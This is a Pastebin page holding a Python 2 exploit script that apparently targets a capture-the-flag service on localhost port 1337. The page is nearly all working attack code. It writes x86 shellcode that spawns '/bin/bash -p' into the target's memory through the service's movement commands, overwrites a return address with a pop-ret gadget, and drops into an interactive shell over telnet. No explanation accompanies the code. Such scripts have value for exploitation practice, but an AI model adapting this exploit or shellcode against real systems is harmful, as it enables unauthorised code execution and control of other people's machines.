Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- from struct import pack,unpack
- from ctypes import c_int32
- import telnetlib
- import ctypes
- #team:m33pWn
- #sung.ta
- def sock(HOST, PORT, debug=True):
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect( (HOST, PORT) )
- if debug: print "[+] Connected to server"
- return s
- def recvu(str,debug=0):
- recv=''
- while not str in recv:
- tmp=s.recv(4096)
- recv+=tmp
- if debug:
- print tmp
- continue
- return recv
- def telnet(s):
- t = telnetlib.Telnet()
- t.sock = s
- t.interact()
- def send(s, m, debug = True):
- if debug: print "[+] Send:", repr(m)
- s.send(m)
- def recv(s, debug = True):
- m = s.recv(4096)
- if debug: print "[+] Recv\n", repr(m)
- return m
- def recv_full(s, debug = True):
- data = ""
- while True:
- m = recv(s, False)
- data += m
- if len(m)<4096: break
- if debug: print "[+] Recv\n", repr(data)
- return data
- def p(m):
- return pack("<I", m)
- def u(m):
- return unpack("<I", m)[0]
- def send_fun(sock,ran,pay):
- if(ran>0):
- ran=ran+len(pay)
- s=ran/40+1
- a=s*40-ran
- send(sock,str(s)+"s\n")
- send(sock,str(a)+"a\n")
- if(ran<0):
- ran=ran+len(pay)
- w=ran/40
- a= -ran-w*40
- send(sock,str(w)+"w\n")
- send(sock,str(a)+"a\n")
- for i in range(len(pay)):
- index=len(pay)-i-1
- send(sock,"a\n")
- mesg="p"+pay[index]+"\n"
- send(sock,mesg)
- return ran
- def doexploit():
- s=sock("localhost",1337)
- rangetoshell=1013
- rangetoreturn=0x349+4+4+4+4+4# ebp ret pop ret +4
- poprtn=0x804887d
- shellcode="\x6a\x0f\x58\x83\xe8\x04\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"
- ret=p(poprtn)
- send_fun(s,rangetoshell,shellcode)
- rannow=rangetoreturn-rangetoshell
- send_fun(s,rannow,ret)
- send(s,"q\n")
- telnet(s)
- s.close()
- doexploit()
Add Comment
Please, Sign In to add comment
